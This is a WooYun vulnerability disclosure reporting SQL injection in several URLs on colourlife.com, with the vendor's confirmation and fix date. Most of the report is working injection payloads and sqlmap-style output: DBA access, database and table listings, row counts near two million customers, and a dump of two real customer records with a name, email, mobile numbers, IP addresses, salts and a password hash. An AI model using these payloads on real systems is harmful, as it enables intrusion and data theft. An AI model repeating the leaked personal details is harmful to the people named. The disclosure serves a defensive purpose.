当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154476

漏洞标题:彩生活多处SQL注入打包(DBA权限/8个库/193W用户信息含密码、手机号)

相关厂商:colourlife.com

漏洞作者: 路人甲

提交时间:2015-11-20 10:34

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

cyz.colourlife.com
注入点:
cyz.colourlife.com/notify/view?id=11950
http://cyz.colourlife.com/gift?start_time=2015-11-03&end_time=2015-11-13
cyz.colourlife.com/refundOrder?start_time=2015-11-05&end_time=2015-11-03&status=
cyz.colourlife.com/record?start_time=2015-11-03&end_time=2015-11-03&type=
cyz.colourlife.com/refundOrder?start_time=2015-11-04&end_time=2015-11-04&status=
http://cyz.colourlife.com/returnOrder?start_time=2015-11-04&end_time=2015-11-05&status=
http://cyz.colourlife.com/electricOrder?start_time=2015-11-04&end_time=2015-11-04&status=
cyz.colourlife.com/reserve?start_time=2015-11-04&end_time=2015-11-04
cyz.colourlife.com/payment?start_time=2015-11-03&end_time=2015-11-04&status=
http://cyz.colourlife.com/notify/index?start_time=2015-11-04&end_time=2015-11-0&category_id=0

漏洞证明:

以cyz.colourlife.com/notify/view?id=11950为例

Payload: id=11950) AND 2430=2430 AND (7224=7224
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: id=11950) AND (SELECT 9819 FROM(SELECT COUNT(*),CONCAT(0x716b716271
,(SELECT (ELT(9819=9819,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a) AND (1044=1044
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11950) AND (SELECT * FROM (SELECT(SLEEP(5)))AGyM) AND (9344=9344
---
[10:11:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[10:11:58] [INFO] testing if current user is DBA
[10:11:58] [INFO] fetching current user
[10:11:58] [INFO] retrieved: colourlife@192.168.2.11
current user is DBA:    True


Payload: id=11950) AND (SELECT * FROM (SELECT(SLEEP(5)))AGyM) AND (9344=9344
---
[09:40:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[09:40:37] [INFO] fetching database names
[09:40:37] [INFO] the SQL query used returns 8 entries
[09:40:37] [INFO] retrieved: information_schema
[09:40:37] [INFO] retrieved: colourlife
[09:40:37] [INFO] retrieved: jay
[09:40:38] [INFO] retrieved: mysql
[09:40:38] [INFO] retrieved: openfire
[09:40:38] [INFO] retrieved: performance_schema
[09:40:38] [INFO] retrieved: phpmyadmin
[09:40:38] [INFO] retrieved: test
available databases [8]:
[*] colourlife
[*] information_schema
[*] jay
[*] mysql
[*] openfire
[*] performance_schema
[*] phpmyadmin
[*] test
<code>[09:42:43] [INFO] retrieved: lucky_layout
[09:42:43] [INFO] retrieved: lucky_litchi_envelope
[09:42:43] [INFO] retrieved: lucky_may_car
[09:42:44] [INFO] retrieved: lucky_may_car_outcome
[09:42:44] [INFO] retrieved: lucky_may_car_outcome_copy
[09:42:44] [INFO] retrieved: lucky_may_car_outcome_copy1
[09:42:44] [INFO] retrieved: lucky_prize
[09:42:45] [INFO] retrieved: lucky_prize_born
[09:42:45] [INFO] retrieved: lucky_red_envelope
[09:42:45] [INFO] retrieved: lucky_shop
[09:42:45] [INFO] retrieved: lucky_shop_data
[09:42:45] [INFO] retrieved: middle_log
[09:42:46] [INFO] retrieved: migration
[09:42:46] [INFO] retrieved: milk_examine
[09:42:46] [INFO] retrieved: milk_invite
[09:42:47] [INFO] retrieved: milk_invite_bak
[09:42:47] [INFO] retrieved: moon_cakes_result
[09:42:47] [INFO] retrieved: moon_cakes_result_copy
[09:42:48] [INFO] retrieved: moon_cakes_result_copy1
[09:42:48] [INFO] retrieved: moon_cakes_result_copy2
[09:42:48] [INFO] retrieved: news_conference
[09:42:49] [INFO] retrieved: nian_nian_ka
[09:42:49] [INFO] retrieved: notify
[09:42:49] [INFO] retrieved: notify_category
[09:42:49] [INFO] retrieved: notify_community_relation
[09:42:49] [INFO] retrieved: oadata
[09:42:50] [INFO] retrieved: old_property_address
[09:42:50] [INFO] retrieved: one_yuan_code
[09:42:50] [INFO] retrieved: order
[09:42:51] [INFO] retrieved: order_copy
[09:42:51] [INFO] retrieved: order_goods_relation
[09:42:51] [INFO] retrieved: order_log
[09:42:51] [INFO] retrieved: order_send_present
[09:42:52] [INFO] retrieved: order_send_redpacket
[09:42:52] [INFO] retrieved: order_send_redpacket_bak
[09:42:52] [INFO] retrieved: others_fees
[09:42:52] [INFO] retrieved: others_fees_log
[09:42:53] [INFO] retrieved: othertemp
[09:42:53] [INFO] retrieved: parking_address
[09:42:53] [INFO] retrieved: parking_fees
[09:42:53] [INFO] retrieved: parking_fees_gemeite
[09:42:54] [INFO] retrieved: parking_fees_month
[09:42:54] [INFO] retrieved: parking_fees_type
[09:42:54] [INFO] retrieved: parking_fees_visitor
[09:42:54] [INFO] retrieved: parking_lot
[09:42:54] [INFO] retrieved: parking_month_config
[09:42:55] [INFO] retrieved: pay
[09:42:55] [INFO] retrieved: pay_log
[09:42:55] [INFO] retrieved: payment
[09:42:55] [INFO] retrieved: perfect_crab_outcome
[09:42:55] [INFO] retrieved: personal_repairs_cate_community_relation
[09:42:56] [INFO] retrieved: personal_repairs_cate_shop_relation
[09:42:56] [INFO] retrieved: personal_repairs_category
[09:42:56] [INFO] retrieved: personal_repairs_handling
[09:42:56] [INFO] retrieved: personal_repairs_info
[09:42:57] [INFO] retrieved: personal_repairs_log
[09:42:57] [INFO] retrieved: phone_recharge
[09:42:57] [INFO] retrieved: picture
[09:42:57] [INFO] retrieved: platform_shop_apply
[09:42:58] [INFO] retrieved: platform_shop_category
[09:42:58] [INFO] retrieved: pos_machine_paysyntony
[09:42:58] [INFO] retrieved: position
[09:42:59] [INFO] retrieved: power_address
[09:42:59] [INFO] retrieved: power_fees
[09:42:59] [INFO] retrieved: property_activity
[09:42:59] [INFO] retrieved: property_activity_rate
[09:43:00] [INFO] retrieved: property_address
[09:43:00] [INFO] retrieved: property_fee_log
[09:43:00] [INFO] retrieved: property_fees
[09:43:00] [INFO] retrieved: purchase_cart
[09:43:01] [INFO] retrieved: purchase_goods
[09:43:01] [INFO] retrieved: purchase_goods_category
[09:43:01] [INFO] retrieved: purchase_goods_region_relation
[09:43:01] [INFO] retrieved: purchase_order
[09:43:01] [INFO] retrieved: purchase_order_goods_relation
[09:43:01] [INFO] retrieved: purchase_order_log
[09:43:02] [INFO] retrieved: purchase_retreat_order
[09:43:02] [INFO] retrieved: purchase_retreat_order_goods_relation
[09:43:02] [INFO] retrieved: purchase_retreat_order_log
[09:43:02] [INFO] retrieved: purchase_return
[09:43:03] [INFO] retrieved: purchase_return_goods
[09:43:03] [INFO] retrieved: purchase_return_log
[09:43:03] [INFO] retrieved: push_client
[09:43:03] [INFO] retrieved: push_information
[09:43:03] [INFO] retrieved: questionnaire
[09:43:03] [INFO] retrieved: recharge
[09:43:04] [INFO] retrieved: recharge_category
[09:43:04] [INFO] retrieved: red_package_config
[09:43:04] [INFO] retrieved: red_package_config_copy
[09:43:04] [INFO] retrieved: red_package_config_copy1
[09:43:05] [INFO] retrieved: red_packet
[09:43:05] [INFO] retrieved: red_packet_carry
[09:43:06] [INFO] retrieved: red_packet_pay_pwd_val
[09:43:06] [INFO] retrieved: red_packet_pwd_type
[09:43:06] [INFO] retrieved: redpacket_fees
[09:43:06] [INFO] retrieved: redpacket_fees_addr
[09:43:06] [INFO] retrieved: redpacket_fees_log
[09:43:06] [INFO] retrieved: redpacket_fees_percent
[09:43:06] [INFO] retrieved: redpay_whitelist
[09:43:07] [INFO] retrieved: region
[09:43:07] [INFO] retrieved: register_activity
[09:43:07] [INFO] retrieved: repair
[09:43:07] [INFO] retrieved: repair_category
[09:43:07] [INFO] retrieved: reserve
[09:43:08] [INFO] retrieved: reserve_reply
[09:43:08] [INFO] retrieved: retreat_order
[09:43:08] [INFO] retrieved: retreat_order_goods_relation
[09:43:08] [INFO] retrieved: retreat_order_log
[09:43:08] [INFO] retrieved: review
[09:43:08] [INFO] retrieved: reward_comm_def
[09:43:09] [INFO] retrieved: reward_comm_val
[09:43:09] [INFO] retrieved: reward_elicai
[09:43:09] [INFO] retrieved: reward_import_cases
[09:43:09] [INFO] retrieved: reward_import_mark
[09:43:09] [INFO] retrieved: reward_jobs
[09:43:10] [INFO] retrieved: reward_loan
[09:43:10] [INFO] retrieved: reward_product_type
[09:43:10] [INFO] retrieved: reward_rxh
[09:43:10] [INFO] retrieved: rewards
[09:43:10] [INFO] retrieved: rice_dumplings_result
[09:43:10] [INFO] retrieved: rice_dumplings_result_copy
[09:43:10] [INFO] retrieved: risk_log
[09:43:10] [INFO] retrieved: rpt_report_category
[09:43:11] [INFO] retrieved: rpt_report_framework
[09:43:11] [INFO] retrieved: rxh_order
[09:43:11] [INFO] retrieved: send_love
[09:43:11] [INFO] retrieved: service
[09:43:11] [INFO] retrieved: service_category
[09:43:11] [INFO] retrieved: set_litchi
[09:43:11] [INFO] retrieved: set_moon_cakes
[09:43:11] [INFO] retrieved: set_moon_cakes_copy
[09:43:11] [INFO] retrieved: set_moon_cakes_copy1
[09:43:12] [INFO] retrieved: set_perfect_crab
[09:43:12] [INFO] retrieved: set_perfect_crab_copy
[09:43:12] [INFO] retrieved: set_rice_dumplings
[09:43:12] [INFO] retrieved: set_rice_dumplings_copy
[09:43:12] [INFO] retrieved: set_teams_promotion
[09:43:12] [INFO] retrieved: setable_activity
[09:43:12] [INFO] retrieved: setable_activity_model
[09:43:12] [INFO] retrieved: setable_activity_pic
[09:43:12] [INFO] retrieved: setable_activity_pic_community_relation
[09:43:13] [INFO] retrieved: setable_ad
[09:43:13] [INFO] retrieved: setable_ad.bak
[09:43:13] [INFO] retrieved: setable_ad_community_relation
[09:43:13] [INFO] retrieved: setable_ad_community_relation.bak
[09:43:13] [INFO] retrieved: setable_ad_copy
[09:43:13] [INFO] retrieved: setable_ad_copy1
[09:43:13] [INFO] retrieved: setable_cls
[09:43:13] [INFO] retrieved: setable_cls.bak
[09:43:13] [INFO] retrieved: setable_cls_community_relation
[09:43:14] [INFO] retrieved: setable_cls_community_relation.bak
[09:43:14] [INFO] retrieved: setable_small_loans
[09:43:14] [INFO] retrieved: setable_small_loans.bak
[09:43:14] [INFO] retrieved: setable_small_loans_cls
[09:43:14] [INFO] retrieved: setable_small_loans_community_relation
[09:43:14] [INFO] retrieved: setable_start_img
[09:43:14] [INFO] retrieved: shift_info
[09:43:15] [INFO] retrieved: shop
[09:43:15] [INFO] retrieved: shop_backend_log
[09:43:15] [INFO] retrieved: shop_backend_log_his
[09:43:15] [INFO] retrieved: shop_category
[09:43:15] [INFO] retrieved: shop_community_goods_ownership
[09:43:15] [INFO] retrieved: shop_community_goods_sell
[09:43:15] [INFO] retrieved: shop_community_goods_sell_copy
[09:43:15] [INFO] retrieved: shop_community_relation
[09:43:16] [INFO] retrieved: shop_relation
[09:43:16] [INFO] retrieved: shop_session
[09:43:16] [INFO] retrieved: small_loans
[09:43:16] [INFO] retrieved: small_loans_community_relation
[09:43:16] [INFO] retrieved: sms
[09:43:16] [INFO] retrieved: sms_count
[09:43:17] [INFO] retrieved: sms_interface
[09:43:17] [INFO] retrieved: sms_log
[09:43:17] [INFO] retrieved: sms_template
[09:43:17] [INFO] retrieved: staff_complain_category
[09:43:17] [INFO] retrieved: statement
[09:43:18] [INFO] retrieved: statement_queue
[09:43:18] [INFO] retrieved: suggestion
[09:43:18] [INFO] retrieved: suggestion_category
[09:43:18] [INFO] retrieved: suggestion_level
[09:43:18] [INFO] retrieved: suggestion_reply
[09:43:19] [INFO] retrieved: surrounding
[09:43:19] [INFO] retrieved: surrounding_content
[09:43:19] [INFO] retrieved: surrounding_tab
[09:43:19] [INFO] retrieved: taikang_life
[09:43:19] [INFO] retrieved: team_code
[09:43:19] [INFO] retrieved: telecom
[09:43:20] [INFO] retrieved: temp
[09:43:20] [INFO] retrieved: thankful_cards
[09:43:20] [INFO] retrieved: third_fees
[09:43:20] [INFO] retrieved: third_fees_addr
[09:43:20] [INFO] retrieved: third_fees_log
[09:43:20] [INFO] retrieved: third_fees_seller
[09:43:20] [INFO] retrieved: third_party_account
[09:43:20] [INFO] retrieved: thq_order
[09:43:20] [INFO] retrieved: thq_order_goods
[09:43:20] [INFO] retrieved: tmp
[09:43:21] [INFO] retrieved: tmp_build
[09:43:21] [INFO] retrieved: tmp_complain_repairs_id
[09:43:21] [INFO] retrieved: tmp_customer
[09:43:21] [INFO] retrieved: tmp_fee
[09:43:22] [INFO] retrieved: tmp_others_fees
[09:43:22] [INFO] retrieved: tmp_t1
[09:43:22] [INFO] retrieved: tmp_t3
[09:43:22] [INFO] retrieved: tmp_update
[09:43:22] [INFO] retrieved: tmp_user_room
[09:43:23] [INFO] retrieved: topic
[09:43:23] [INFO] retrieved: topic_category
[09:43:23] [INFO] retrieved: topic_comment
[09:43:23] [INFO] retrieved: topic_favour
[09:43:23] [INFO] retrieved: topic_focus
[09:43:23] [INFO] retrieved: topic_group
[09:43:23] [INFO] retrieved: topic_group_community_relation
[09:43:23] [INFO] retrieved: topic_group_customer_relation
[09:43:24] [INFO] retrieved: topic_pic
[09:43:24] [INFO] retrieved: tt01
[09:43:24] [INFO] retrieved: user_coupons
[09:43:24] [INFO] retrieved: user_coupons_copy
[09:43:25] [INFO] retrieved: user_info
[09:43:25] [INFO] retrieved: user_login_log
[09:43:25] [INFO] retrieved: user_ti_huo_quan
[09:43:25] [INFO] retrieved: user_wifi_log
[09:43:25] [INFO] retrieved: virtual_recharge
[09:43:26] [INFO] retrieved: visit
[09:43:26] [INFO] retrieved: year_invite
[09:43:26] [INFO] retrieved: you_hui_quan
[09:43:26] [INFO] retrieved: 21
[09:43:26] [INFO] retrieved: 569809
[09:43:26] [INFO] retrieved: 4
[09:43:27] [INFO] retrieved: 854
[09:43:30] [INFO] retrieved: 3255587
[09:43:30] [INFO] retrieved: 0
[09:43:30] [INFO] retrieved: 0
[09:43:30] [INFO] retrieved: 32189
[09:43:31] [INFO] retrieved: 784
[09:43:31] [INFO] retrieved: 0
[09:43:31] [INFO] retrieved: 25
[09:43:31] [INFO] retrieved: 256
[09:43:31] [INFO] retrieved: 5
[09:43:31] [INFO] retrieved: 470
[09:43:32] [INFO] retrieved: 601498
[09:43:32] [INFO] retrieved: 197
[09:43:33] [INFO] retrieved: 47159
[09:43:33] [INFO] retrieved: 162
[09:43:33] [INFO] retrieved: 360700
[09:43:34] [INFO] retrieved: 331888
[09:43:34] [INFO] retrieved: 45
[09:43:34] [INFO] retrieved: 4578
[09:43:35] [INFO] retrieved: 1938067
[09:43:35] [INFO] retrieved: 33
[09:43:35] [INFO] retrieved: 4045
[09:43:35] [INFO] retrieved: 15
[09:43:35] [INFO] retrieved: 1
[09:43:36] [INFO] retrieved: 64
[09:43:36] [INFO] retrieved: 18
[09:43:36] [INFO] retrieved: 847
[09:43:45] [INFO] retrieved: 23788463
[09:43:45] [INFO] retrieved: 68
[09:43:48] [INFO] retrieved: 1551862
[09:43:49] [INFO] retrieved: 8
[09:43:49] [INFO] retrieved: 0
[09:43:49] [INFO] retrieved: 31
[09:43:49] [INFO] retrieved: 30
[09:43:50] [INFO] retrieved: 139454
[09:43:50] [INFO] retrieved: 6
[09:43:50] [INFO] retrieved: 251
[09:43:50] [INFO] retrieved: 37070
[09:43:50] [INFO] retrieved: 7
[09:43:56] [INFO] retrieved: 7805559
[09:43:56] [INFO] retrieved: 208
[09:43:57] [INFO] retrieved: 2905288
[09:43:57] [INFO] retrieved: 538
[09:43:57] [INFO] retrieved: 1
[09:43:57] [INFO] retrieved: 676
[09:43:58] [INFO] retrieved: 299769
[09:43:58] [INFO] retrieved: 93122
[09:43:58] [INFO] retrieved: 2443
[09:43:58] [INFO] retrieved: 0
[09:43:59] [INFO] retrieved: 392
[09:43:59] [INFO] retrieved: 25
[09:43:59] [INFO] retrieved: 10
[09:43:59] [INFO] retrieved: 107
[09:44:00] [INFO] retrieved: 962
[09:44:00] [INFO] retrieved: 45
[09:44:00] [INFO] retrieved: 35


实在太慢了,就不跑了

Payload: id=11950) AND (SELECT 9819 FROM(SELECT COUNT(*),CONCAT(0x716b716271
,(SELECT (ELT(9819=9819,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a) AND (1044=1044
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11950) AND (SELECT * FROM (SELECT(SLEEP(5)))AGyM) AND (9344=9344
---
[10:20:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[10:20:35] [INFO] resumed: 1938067
Database: colourlife
+----------+---------+
| Table    | Entries |
+----------+---------+
| customer | 1938067 |
+----------+---------+


就跑前面两条吧

Payload: id=11950) AND (SELECT 9819 FROM(SELECT COUNT(*),CONCAT(0x716b716271
,(SELECT (ELT(9819=9819,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a) AND (1044=1044
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11950) AND (SELECT * FROM (SELECT(SLEEP(5)))AGyM) AND (9344=9344
---
[10:22:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[10:22:25] [INFO] fetching columns for table 'customer' in database 'colourlife'
[10:22:27] [INFO] the SQL query used returns 35 entries
[10:22:28] [INFO] retrieved: id
[10:22:30] [INFO] retrieved: int(11)
[10:22:31] [INFO] retrieved: username
[10:22:32] [INFO] retrieved: varchar(255)
[10:22:33] [INFO] retrieved: password
[10:22:35] [INFO] retrieved: char(32)
[10:22:36] [INFO] retrieved: salt
[10:22:37] [INFO] retrieved: char(8)
[10:22:38] [INFO] retrieved: name
[10:22:40] [INFO] retrieved: varchar(255)
[10:22:41] [INFO] retrieved: nickname
[10:22:42] [INFO] retrieved: varchar(255)
[10:22:44] [INFO] retrieved: mobile
[10:22:45] [INFO] retrieved: varchar(15)
[10:22:46] [INFO] retrieved: email
[10:22:47] [INFO] retrieved: varchar(255)
[10:22:49] [INFO] retrieved: community_id
[10:22:50] [INFO] retrieved: int(11)
[10:22:51] [INFO] retrieved: build_id
[10:22:52] [INFO] retrieved: int(11)
[10:22:54] [INFO] retrieved: room
[10:22:56] [INFO] retrieved: varchar(255)
[10:22:57] [INFO] retrieved: is_show_in_neighbor
[10:22:58] [INFO] retrieved: tinyint(1)
[10:22:59] [INFO] retrieved: create_time
[10:23:01] [INFO] retrieved: int(11)
[10:23:02] [INFO] retrieved: last_time
[10:23:04] [INFO] retrieved: int(11)
[10:23:05] [INFO] retrieved: last_ip
[10:23:07] [INFO] retrieved: varchar(15)
[10:23:08] [INFO] retrieved: state
[10:23:09] [INFO] retrieved: tinyint(1)
[10:23:10] [INFO] retrieved: is_deleted
[10:23:11] [INFO] retrieved: tinyint(1)
[10:23:13] [INFO] retrieved: audit
[10:23:14] [INFO] retrieved: tinyint(1)
[10:23:25] [INFO] retrieved: credit
[10:23:27] [INFO] retrieved: int(11)
[10:23:28] [INFO] retrieved: portrait
[10:23:30] [INFO] retrieved: varchar(255)
[10:23:31] [INFO] retrieved: old_mobile
[10:23:32] [INFO] retrieved: varchar(15)
[10:23:34] [INFO] retrieved: status
[10:23:35] [INFO] retrieved: tinyint(3)
[10:23:36] [INFO] retrieved: reg_type
[10:23:37] [INFO] retrieved: tinyint(4)
[10:23:39] [INFO] retrieved: reg_identity
[10:23:40] [INFO] retrieved: varchar(45)
[10:23:41] [INFO] retrieved: balance
[10:23:42] [INFO] retrieved: decimal(10,2)
[10:23:44] [INFO] retrieved: is_complete
[10:23:45] [INFO] retrieved: int(1)
[10:23:46] [INFO] retrieved: first_do_lucky
[10:23:48] [INFO] retrieved: tinyint(1)
[10:23:49] [INFO] retrieved: customer_code
[10:23:50] [INFO] retrieved: char(5)
[10:23:51] [INFO] retrieved: invite_code
[10:23:53] [INFO] retrieved: char(5)
[10:23:54] [INFO] retrieved: channel
[10:23:55] [INFO] retrieved: varchar(255)
[10:23:57] [INFO] retrieved: is_success
[10:23:58] [INFO] retrieved: tinyint(1)
[10:23:59] [INFO] retrieved: is_success_licai
[10:24:00] [INFO] retrieved: tinyint(1)
[10:24:01] [INFO] retrieved: is_send
[10:24:03] [INFO] retrieved: tinyint(1)
[10:24:04] [INFO] retrieved: is_lingqu_weixiu
[10:24:05] [INFO] retrieved: tinyint(1)
[10:24:07] [INFO] retrieved: pay_password
[10:24:08] [INFO] retrieved: char(32)
[10:24:08] [INFO] fetching entries for table 'customer' in database 'colourlife'
[10:24:10] [INFO] retrieved: 0
[10:24:12] [INFO] retrieved: 0.00
[10:24:14] [INFO] retrieved: 24
[10:24:15] [INFO] retrieved: Colourlife
[10:24:16] [INFO] retrieved: 1
[10:24:18] [INFO] retrieved: 1369795286
[10:24:19] [INFO] retrieved: 0
[10:24:20] [INFO] retrieved: S0UYU
[10:24:21] [INFO] retrieved: boger@cyberway.net.cn
[10:24:23] [INFO] retrieved: 1
[10:24:24] [INFO] retrieved: 1
[10:24:25] [INFO] retrieved:
[10:24:26] [INFO] retrieved: 0
[10:24:28] [INFO] retrieved: 1
[10:24:29] [INFO] retrieved: 0
[10:24:30] [INFO] retrieved: 0
[10:24:32] [INFO] retrieved: 1
[10:24:33] [INFO] retrieved: 0
[10:24:34] [INFO] retrieved: 0
[10:24:35] [INFO] retrieved: 58.210.187.2
[10:24:37] [INFO] retrieved: 1370683303
[10:24:38] [INFO] retrieved: 18901261989
[10:24:39] [INFO] retrieved: 谭宝钢
[10:24:41] [INFO] retrieved:
[10:24:42] [INFO] retrieved:
[10:24:43] [INFO] retrieved: 8bbbe73aa48ef8c2f34ee4acd3bd45ea
[10:24:44] [INFO] retrieved:
[10:24:45] [INFO] retrieved:
[10:24:47] [INFO] retrieved: 0
[10:24:48] [INFO] retrieved: 0
[10:24:49] [INFO] retrieved: 1号
[10:24:51] [INFO] retrieved: 5YzC6iO6
[10:24:52] [INFO] retrieved: 0
[10:24:53] [INFO] retrieved: 0
[10:24:55] [INFO] retrieved: boger
[10:24:56] [INFO] retrieved: 0
[10:24:57] [INFO] retrieved: 0.00
[10:24:59] [INFO] retrieved: 0
[10:25:00] [INFO] retrieved: Colourlife
[10:25:01] [INFO] retrieved: 0
[10:25:03] [INFO] retrieved: 1369806906
[10:25:04] [INFO] retrieved: 0
[10:25:05] [INFO] retrieved: 592RG
[10:25:07] [INFO] retrieved:
[10:25:08] [INFO] retrieved: 1
[10:25:09] [INFO] retrieved: 2
[10:25:11] [INFO] retrieved:
[10:25:12] [INFO] retrieved: 0
[10:25:13] [INFO] retrieved: 1
[10:25:15] [INFO] retrieved: 0
[10:25:16] [INFO] retrieved: 0
[10:25:18] [INFO] retrieved: 1
[10:25:19] [INFO] retrieved: 0
[10:25:20] [INFO] retrieved: 0
[10:25:22] [INFO] retrieved: 113.118.195.79
[10:25:23] [INFO] retrieved: 0
[10:25:24] [INFO] retrieved: 13428901875
[10:25:26] [INFO] retrieved:
[10:25:27] [INFO] retrieved:
[10:25:28] [INFO] retrieved:
[10:25:29] [INFO] retrieved:
[10:25:31] [INFO] retrieved:
[10:25:32] [INFO] retrieved:
[10:25:33] [INFO] retrieved: 0
[10:25:35] [INFO] retrieved: 0
[10:25:36] [INFO] retrieved:
[10:25:37] [INFO] retrieved: th3aq7Oq
[10:25:39] [INFO] retrieved: 0
[10:25:40] [INFO] retrieved: 0
[10:25:41] [INFO] retrieved: user_13428901875
[10:25:41] [INFO] analyzing table dump for possible password hashes
[10:25:41] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: colourlife
Table: customer
[2 entries]
+----+----------+--------------+--------------+---------+---------+----------+--
-----+-----------------------+-------+--------+-------------+--------+----------
------+---------+------------+---------+------------------+----------+----------
------------------------+----------+----------+------------+------------+-------
-----+------------+-------------+-------------+-------------+--------------+----
-----------+----------------+------------------+------------------+-------------
--------+
| id | build_id | community_id | reg_identity | room    | name    | salt     | s
tate | email                 | audit | status | mobile      | credit | last_ip
      | is_send | channel    | balance | username         | portrait | password
                        | reg_type | nickname | last_time  | is_success | is_del
eted | old_mobile | create_time | invite_code | is_complete | pay_password | cus
tomer_code | first_do_lucky | is_lingqu_weixiu | is_success_licai | is_show_in_n
eighbor |
+----+----------+--------------+--------------+---------+---------+----------+--
-----+-----------------------+-------+--------+-------------+--------+----------
------+---------+------------+---------+------------------+----------+----------
------------------------+----------+----------+------------+------------+-------
-----+------------+-------------+-------------+-------------+--------------+----
-----------+----------------+------------------+------------------+-------------
--------+
| 1  | 24       | 1            | 0            | 1号      | 谭宝钢     | 5YzC6iO6
 | 0     | boger@cyberway.net.cn | 0     | 0      | 18901261989 | 0      | 58.21
0.187.2   | 0       | Colourlife | 0.00    | boger            | <blank>  | 8bbbe
73aa48ef8c2f34ee4acd3bd45ea | 0        | <blank>  | 1370683303 | 0          | 1
         | <blank>    | 1369795286  | <blank>     | 0           | <blank>      |
 S0UYU         | 1              | 0                | 0                | 1
            |
| 2  | 0        | 0            | 0            | <blank> | <blank> | th3aq7Oq | 0
     | <blank>               | 0     | 0      | 13428901875 | 0      | 113.118.1
95.79 | 0       | Colourlife | 0.00    | user_13428901875 | <blank>  | <blank>
                        | 0        | <blank>  | 0          | 0          | 1
     | <blank>    | 1369806906  | <blank>     | 0           | <blank>      | 592
RG         | 1              | 0                | 0                | 1
        |
+----+----------+--------------+--------------+---------+---------+----------+--
-----+-----------------------+-------+--------+-------------+--------+----------
------+---------+------------+---------+------------------+----------+----------
------------------------+----------+----------+------------+------------+-------
-----+------------+-------------+-------------+-------------+--------------+----
-----------+----------------+------------------+------------------+-------------
--------+


修复方案:

过滤SQL特殊字符

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-20 19:36

厂商回复:

完全裸露了

最新状态:

2015-11-21:已经修复漏洞。

漏洞评价:

评价